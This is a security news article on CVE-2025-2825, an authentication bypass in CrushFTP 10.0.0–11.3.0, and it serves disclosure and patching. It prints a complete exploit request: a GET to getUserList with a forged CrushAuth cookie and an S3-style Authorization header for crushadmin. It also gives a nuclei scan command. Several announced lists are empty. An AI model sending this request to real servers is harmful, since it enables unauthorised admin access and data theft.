A newly disclosed authentication bypass vulnerability (CVE-2025-2825) in CrushFTP file transfer software enables attackers to gain complete control of servers without valid credentials.
The vulnerability affects versions 10.0.0 through 11.3.0 of the popular enterprise file transfer solution, exposing organizations to data theft and system compromise.
Security researchers have revealed how attackers can exploit this vulnerability using a simple HTTP request:
GET /WebInterface/function/?command=getUserList&c2f=1111 HTTP/1.1
Host: target-server:8081
Cookie: CrushAuth=1743113839553_vD96EZ70ONL6xAd1DAJhXMZYMn1111
Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/
This attack combines three critical components:
The vulnerability stems from flawed authentication logic when processing S3-style requests:
Security analysts confirm that 75% of CrushFTP instances remain unpatched as of March 31, 2025, despite fixes being available since March 26.
CrushFTP released version 11.3.1 with crucial fixes:
Immediate Action Required:
nuclei -t https://cloud.projectdiscovery.io/public/CVE-2025-2825
This vulnerability highlights three critical security lessons:
Security teams should implement web application firewalls to block malformed S3 headers while patching. CrushFTP servers exposed to the internet should be considered high-risk until updated.
Find this News Interesting! Follow us on Google News, LinkedIn, and X to Get Instant Updates
!
GCHQ’s National Cyber Security Centre (NCSC), in collaboration with international and industry partners, has issued…
In today's digital era, organizations face an ever-growing threat landscape, with cyberattacks, data breaches, and…
Google has rolled out a critical update for its Chrome browser, addressing a high-severity vulnerability…
Microsoft has disclosed an active exploitation of a zero-day vulnerability in the Windows Common Log…
Elastic, the company behind Kibana, has released critical security updates to address a high-severity vulnerability…
A recently discovered vulnerability in the AWS Systems Manager (SSM) Agent, a cornerstone of Amazon…